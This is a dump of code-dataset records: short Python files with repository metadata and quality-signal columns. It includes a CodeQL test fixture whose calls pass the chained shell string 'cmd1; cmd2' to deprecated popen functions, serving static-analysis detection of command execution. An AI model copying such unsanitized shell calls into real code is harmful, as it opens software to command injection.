hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fceac12585afae9e5a31f7ec57df0118128731ef | 22 | py | Python | apps/beatitud_annotate/models/__init__.py | beatitud/beatitud-back | 32de6c33ec5d70e35bf76c38bedc73c5b2c3e719 | [
"MIT"
] | null | null | null | apps/beatitud_annotate/models/__init__.py | beatitud/beatitud-back | 32de6c33ec5d70e35bf76c38bedc73c5b2c3e719 | [
"MIT"
] | null | null | null | apps/beatitud_annotate/models/__init__.py | beatitud/beatitud-back | 32de6c33ec5d70e35bf76c38bedc73c5b2c3e719 | [
"MIT"
] | null | null | null | from .vatican import * | 22 | 22 | 0.772727 | 3 | 22 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 22 | 1 | 22 | 22 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1e528a95ca2f907beb83b697be58e0b88ba04c8d | 179 | py | Python | resource/pypi/cffi-1.9.1/testing/cffi0/snippets/distutils_package_1/setup.py | hipnusleo/Laserjet | f53e0b740f48f2feb0c0bb285ec6728b313b4ccc | [
"Apache-2.0"
] | null | null | null | resource/pypi/cffi-1.9.1/testing/cffi0/snippets/distutils_package_1/setup.py | hipnusleo/Laserjet | f53e0b740f48f2feb0c0bb285ec6728b313b4ccc | [
"Apache-2.0"
] | null | null | null | resource/pypi/cffi-1.9.1/testing/cffi0/snippets/distutils_package_1/setup.py | hipnusleo/Laserjet | f53e0b740f48f2feb0c0bb285ec6728b313b4ccc | [
"Apache-2.0"
] | null | null | null |
from distutils.core import setup
import snip_basic_verify1
setup(
packages=['snip_basic_verify1'],
ext_modules=[snip_basic_verify1.ffi.verifier.get_extension()])
| 22.375 | 67 | 0.759777 | 23 | 179 | 5.565217 | 0.652174 | 0.210938 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 0.145251 | 179 | 7 | 68 | 25.571429 | 0.816993 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
1e61a9c93993a3dae67d333a409b794bb94d490c | 1,364 | py | Python | python/ql/test/experimental/library-tests/frameworks/stdlib-py2/SystemCommandExecution.py | vadi2/codeql | a806a4f08696d241ab295a286999251b56a6860c | [
"MIT"
] | 4,036 | 2020-04-29T00:09:57.000Z | 2022-03-31T14:16:38.000Z | python/ql/test/experimental/library-tests/frameworks/stdlib-py2/SystemCommandExecution.py | vadi2/codeql | a806a4f08696d241ab295a286999251b56a6860c | [
"MIT"
] | 2,970 | 2020-04-28T17:24:18.000Z | 2022-03-31T22:40:46.000Z | python/ql/test/library-tests/frameworks/stdlib-py2/SystemCommandExecution.py | ScriptBox99/github-codeql | 2ecf0d3264db8fb4904b2056964da469372a235c | [
"MIT"
] | 794 | 2020-04-29T00:28:25.000Z | 2022-03-30T08:21:46.000Z | ########################################
import os
os.popen2("cmd1; cmd2") # $getCommand="cmd1; cmd2"
os.popen3("cmd1; cmd2") # $getCommand="cmd1; cmd2"
os.popen4("cmd1; cmd2") # $getCommand="cmd1; cmd2"
os.popen2(cmd="cmd1; cmd2") # $getCommand="cmd1; cmd2"
os.popen3(cmd="cmd1; cmd2") # $getCommand="cmd1; cmd2"
os.popen4(cmd="cmd1; cmd2") # $getCommand="cmd1; cmd2"
# os.popen does not support keyword arguments, so this is a TypeError
os.popen(cmd="cmd1; cmd2")
########################################
import platform
platform.popen("cmd1; cmd2") # $getCommand="cmd1; cmd2"
platform.popen(cmd="cmd1; cmd2") # $getCommand="cmd1; cmd2"
########################################
# popen2 was deprecated in Python 2.6, but still available in Python 2.7
import popen2
popen2.popen2("cmd1; cmd2") # $getCommand="cmd1; cmd2"
popen2.popen3("cmd1; cmd2") # $getCommand="cmd1; cmd2"
popen2.popen4("cmd1; cmd2") # $getCommand="cmd1; cmd2"
popen2.Popen3("cmd1; cmd2") # $getCommand="cmd1; cmd2"
popen2.Popen4("cmd1; cmd2") # $getCommand="cmd1; cmd2"
popen2.popen2(cmd="cmd1; cmd2") # $getCommand="cmd1; cmd2"
popen2.popen3(cmd="cmd1; cmd2") # $getCommand="cmd1; cmd2"
popen2.popen4(cmd="cmd1; cmd2") # $getCommand="cmd1; cmd2"
popen2.Popen3(cmd="cmd1; cmd2") # $getCommand="cmd1; cmd2"
popen2.Popen4(cmd="cmd1; cmd2") # $getCommand="cmd1; cmd2"
| 36.864865 | 72 | 0.624633 | 172 | 1,364 | 4.953488 | 0.180233 | 0.347418 | 0.380282 | 0.464789 | 0.778169 | 0.747653 | 0.700704 | 0.442488 | 0.442488 | 0.442488 | 0 | 0.087531 | 0.11217 | 1,364 | 36 | 73 | 37.888889 | 0.61602 | 0.431085 | 0 | 0 | 0 | 0 | 0.299213 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.136364 | 0 | 0.136364 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1ea9610fcb177e17bbcd7f60960cc77d957d6067 | 21 | py | Python | catkin_pi/catkin_ws/devel/lib/python2.7/dist-packages/docking/srv/__init__.py | henryplas/appstaterobotics | 017fe57d2deec1bd3b400bae83c16194dc874af6 | [
"MIT"
] | null | null | null | catkin_pi/catkin_ws/devel/lib/python2.7/dist-packages/docking/srv/__init__.py | henryplas/appstaterobotics | 017fe57d2deec1bd3b400bae83c16194dc874af6 | [
"MIT"
] | null | null | null | catkin_pi/catkin_ws/devel/lib/python2.7/dist-packages/docking/srv/__init__.py | henryplas/appstaterobotics | 017fe57d2deec1bd3b400bae83c16194dc874af6 | [
"MIT"
] | 1 | 2019-09-13T22:09:01.000Z | 2019-09-13T22:09:01.000Z | from ._Dock import *
| 10.5 | 20 | 0.714286 | 3 | 21 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 21 | 1 | 21 | 21 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1eaaa385bf0c86fee47c83a568d33cb1ac30b3fd | 31 | py | Python | utils/__init__.py | lstomberg/BHNVGCBalanceChecker | 058d9a56e3c875f22176f96b46c9fd02529da600 | [
"Apache-2.0"
] | 1 | 2021-08-19T07:14:27.000Z | 2021-08-19T07:14:27.000Z | utils/__init__.py | lstomberg/BHNVGCBalanceChecker | 058d9a56e3c875f22176f96b46c9fd02529da600 | [
"Apache-2.0"
] | null | null | null | utils/__init__.py | lstomberg/BHNVGCBalanceChecker | 058d9a56e3c875f22176f96b46c9fd02529da600 | [
"Apache-2.0"
] | null | null | null | from cards import VisaGiftCard
| 15.5 | 30 | 0.870968 | 4 | 31 | 6.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
94a29ce6c09db23d0959fe59aaedd4ac4a0d5ada | 66 | py | Python | devel/lib/python2.7/dist-packages/warehouse/msg/__init__.py | frozaidi/RobotSystems | e2c2f9e1623c71d6f5889e84bd9b4ff1d2043a1e | [
"BSD-3-Clause"
] | null | null | null | devel/lib/python2.7/dist-packages/warehouse/msg/__init__.py | frozaidi/RobotSystems | e2c2f9e1623c71d6f5889e84bd9b4ff1d2043a1e | [
"BSD-3-Clause"
] | null | null | null | devel/lib/python2.7/dist-packages/warehouse/msg/__init__.py | frozaidi/RobotSystems | e2c2f9e1623c71d6f5889e84bd9b4ff1d2043a1e | [
"BSD-3-Clause"
] | null | null | null | from ._Grasp import *
from ._Pose import *
from ._Rotate import *
| 16.5 | 22 | 0.727273 | 9 | 66 | 5 | 0.555556 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 66 | 3 | 23 | 22 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
94aad34992121b482f4b1321b3cf600642e7d327 | 35 | py | Python | cloud_provider/__init__.py | mridhul/minion-manager | 7301ac6360a82dfdd27e682d070c34e90f080149 | [
"Apache-2.0"
] | 54 | 2018-07-06T18:06:54.000Z | 2019-06-03T15:21:01.000Z | cloud_provider/__init__.py | mridhul/minion-manager | 7301ac6360a82dfdd27e682d070c34e90f080149 | [
"Apache-2.0"
] | 28 | 2018-07-05T23:32:22.000Z | 2019-07-19T17:19:26.000Z | cloud_provider/__init__.py | mridhul/minion-manager | 7301ac6360a82dfdd27e682d070c34e90f080149 | [
"Apache-2.0"
] | 15 | 2018-07-28T04:51:01.000Z | 2019-07-30T14:50:25.000Z | from base import MinionManagerBase
| 17.5 | 34 | 0.885714 | 4 | 35 | 7.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bf55529015d36538f2755b8f6635f293c51ad596 | 64 | py | Python | 8_kyu/Grasshopper_Terminal_game_combat_function.py | UlrichBerntien/Codewars-Katas | bbd025e67aa352d313564d3862db19fffa39f552 | [
"MIT"
] | null | null | null | 8_kyu/Grasshopper_Terminal_game_combat_function.py | UlrichBerntien/Codewars-Katas | bbd025e67aa352d313564d3862db19fffa39f552 | [
"MIT"
] | null | null | null | 8_kyu/Grasshopper_Terminal_game_combat_function.py | UlrichBerntien/Codewars-Katas | bbd025e67aa352d313564d3862db19fffa39f552 | [
"MIT"
] | null | null | null | def combat(health, damage):
return max( health - damage, 0 ) | 32 | 36 | 0.671875 | 9 | 64 | 4.777778 | 0.777778 | 0.55814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 0.203125 | 64 | 2 | 36 | 32 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
44a667e8d49d08590551417c45f0d3b76c2fe0aa | 33 | py | Python | dashtable/html2data/__init__.py | r-dgreen/DashTable | 744cfb6a717fa75a8092c83ebcd49b2668023681 | [
"MIT"
] | 35 | 2017-04-25T04:37:16.000Z | 2022-02-23T05:44:37.000Z | dashtable/html2data/__init__.py | r-dgreen/DashTable | 744cfb6a717fa75a8092c83ebcd49b2668023681 | [
"MIT"
] | 14 | 2016-12-11T12:00:48.000Z | 2021-06-13T06:52:09.000Z | dashtable/html2data/__init__.py | r-dgreen/DashTable | 744cfb6a717fa75a8092c83ebcd49b2668023681 | [
"MIT"
] | 11 | 2017-04-05T14:10:16.000Z | 2022-02-14T16:32:18.000Z | from .html2data import html2data
| 16.5 | 32 | 0.848485 | 4 | 33 | 7 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068966 | 0.121212 | 33 | 1 | 33 | 33 | 0.896552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7816c18f8b4a9710fb2c6701f796cd8122278c75 | 35 | py | Python | dalloriam/datahose/__init__.py | dalloriam/python-stdlib | 2ce4ebf4545e2ce9c74ef1f2735929f0202598b5 | [
"MIT"
] | null | null | null | dalloriam/datahose/__init__.py | dalloriam/python-stdlib | 2ce4ebf4545e2ce9c74ef1f2735929f0202598b5 | [
"MIT"
] | 2 | 2019-02-10T16:25:58.000Z | 2019-03-13T01:40:15.000Z | dalloriam/datahose/__init__.py | dalloriam/python-stdlib | 2ce4ebf4545e2ce9c74ef1f2735929f0202598b5 | [
"MIT"
] | null | null | null | from .client import DatahoseClient
| 17.5 | 34 | 0.857143 | 4 | 35 | 7.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
785de91c887db0ab68ad3f34f6f0f2b1499c8b53 | 96 | py | Python | venv/lib/python3.8/site-packages/parso/parser.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/parso/parser.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/parso/parser.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/89/72/b1/9ee4c3aae6a7825bcf937a19e22b82cf2547862a0f25a536128cdec528 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.427083 | 0 | 96 | 1 | 96 | 96 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
787dc6e8612b58e6a172216679307ae27b52baba | 1,271 | py | Python | MachineLearning/hw5/utils.py | ChoKyuWon/SchoolProjects | 71a5decefc85ae941ba2d537c4507ba8e615cc34 | [
"MIT"
] | null | null | null | MachineLearning/hw5/utils.py | ChoKyuWon/SchoolProjects | 71a5decefc85ae941ba2d537c4507ba8e615cc34 | [
"MIT"
] | null | null | null | MachineLearning/hw5/utils.py | ChoKyuWon/SchoolProjects | 71a5decefc85ae941ba2d537c4507ba8e615cc34 | [
"MIT"
] | null | null | null | import os
import numpy as np
def load_mnist(data_path):
mnist_path = os.path.join(data_path, 'mnist')
x_train = np.load(os.path.join(mnist_path, 'mnist_train_x.npy'))
y_train = np.load(os.path.join(mnist_path, 'mnist_train_y.npy'))
x_test = np.load(os.path.join(mnist_path, 'mnist_test_x.npy'))
y_test = np.load(os.path.join(mnist_path, 'mnist_test_y.npy'))
x_train = x_train.reshape(len(x_train), 1, 28, 28)
x_test = x_test.reshape(len(x_test), 1, 28, 28)
# Y as one-hot
y_train = np.eye(10)[y_train]
y_test = np.eye(10)[y_test]
return x_train, y_train, x_test, y_test
def load_small_mnist(data_path):
mnist_path = os.path.join(data_path, 'mnist')
x_train = np.load(os.path.join(mnist_path, 'mnist_small_train_x.npy'))
y_train = np.load(os.path.join(mnist_path, 'mnist_small_train_y.npy'))
x_test = np.load(os.path.join(mnist_path, 'mnist_small_test_x.npy'))
y_test = np.load(os.path.join(mnist_path, 'mnist_small_test_y.npy'))
x_train = x_train.reshape(len(x_train), 1, 28, 28)
x_test = x_test.reshape(len(x_test), 1, 28, 28)
# Y as one-hot
y_train = np.eye(5)[y_train]
y_test = np.eye(5)[y_test]
return x_train, y_train, x_test, y_test | 35.305556 | 75 | 0.666404 | 239 | 1,271 | 3.238494 | 0.112971 | 0.139535 | 0.129199 | 0.124031 | 0.937985 | 0.937985 | 0.896641 | 0.896641 | 0.896641 | 0.896641 | 0 | 0.025121 | 0.185681 | 1,271 | 36 | 76 | 35.305556 | 0.722705 | 0.01967 | 0 | 0.333333 | 0 | 0 | 0.137304 | 0.074442 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7881a4bd5425466908e8e51dacf89eafbf735060 | 35 | py | Python | accounts/serializers/__init__.py | Selfnet/sipam | 32d7fde288cf7200cde170eadbd6b3541fa730fe | [
"Apache-2.0"
] | 2 | 2020-04-19T20:00:32.000Z | 2022-01-01T21:00:06.000Z | accounts/serializers/__init__.py | Selfnet/sipam | 32d7fde288cf7200cde170eadbd6b3541fa730fe | [
"Apache-2.0"
] | 7 | 2020-06-05T22:41:24.000Z | 2022-02-28T01:42:45.000Z | accounts/serializers/__init__.py | Selfnet/sipam | 32d7fde288cf7200cde170eadbd6b3541fa730fe | [
"Apache-2.0"
] | null | null | null | from .token import TokenSerializer
| 17.5 | 34 | 0.857143 | 4 | 35 | 7.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
78ca92432db90e33f0ebdf4b76897c1f34c64322 | 287 | py | Python | capsul/qt_gui/widgets/__init__.py | servoz/capsul | 2d72228c096f1c43ecfca7f3651b353dc35e209e | [
"CECILL-B"
] | null | null | null | capsul/qt_gui/widgets/__init__.py | servoz/capsul | 2d72228c096f1c43ecfca7f3651b353dc35e209e | [
"CECILL-B"
] | null | null | null | capsul/qt_gui/widgets/__init__.py | servoz/capsul | 2d72228c096f1c43ecfca7f3651b353dc35e209e | [
"CECILL-B"
] | null | null | null | # -*- coding: utf-8 -*-
from .pipeline_developper_view import PipelineDeveloperView
from .pipeline_user_view import PipelineUserView
from .links_debugger import CapsulLinkDebuggerView
# deprecated. Imported for compatibility
from .pipeline_developper_view import PipelineDevelopperView
| 35.875 | 60 | 0.853659 | 30 | 287 | 7.933333 | 0.633333 | 0.151261 | 0.184874 | 0.218487 | 0.268908 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003846 | 0.094077 | 287 | 7 | 61 | 41 | 0.911538 | 0.209059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
15499829413e42cba8104416aba688cb1c1e30ad | 66 | py | Python | depsland/setup/bat_2_exe/__init__.py | likianta/depsland | 94a8ed7f8a1d3e8e5baafeb2329e30266b52c037 | [
"MIT"
] | null | null | null | depsland/setup/bat_2_exe/__init__.py | likianta/depsland | 94a8ed7f8a1d3e8e5baafeb2329e30266b52c037 | [
"MIT"
] | null | null | null | depsland/setup/bat_2_exe/__init__.py | likianta/depsland | 94a8ed7f8a1d3e8e5baafeb2329e30266b52c037 | [
"MIT"
] | null | null | null | from .bat_2_exe import bat_2_exe
from .png_2_ico import png_2_ico
| 22 | 32 | 0.848485 | 16 | 66 | 3 | 0.4375 | 0.166667 | 0.291667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068966 | 0.121212 | 66 | 2 | 33 | 33 | 0.758621 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
15669e3d04568cf20244d2756537d5f5f53ade6c | 1,265 | py | Python | presalytics_story/models/__init__.py | presalytics/story-python-client | 48ac7830b85d65b94a9f6bbfc0c7ee8344327084 | [
"MIT"
] | null | null | null | presalytics_story/models/__init__.py | presalytics/story-python-client | 48ac7830b85d65b94a9f6bbfc0c7ee8344327084 | [
"MIT"
] | null | null | null | presalytics_story/models/__init__.py | presalytics/story-python-client | 48ac7830b85d65b94a9f6bbfc0c7ee8344327084 | [
"MIT"
] | null | null | null | # coding: utf-8
# flake8: noqa
"""
Communcations
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 0.1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
# import models into model package
from presalytics_story.models.base_model import BaseModel
from presalytics_story.models.ooxml_document import OoxmlDocument
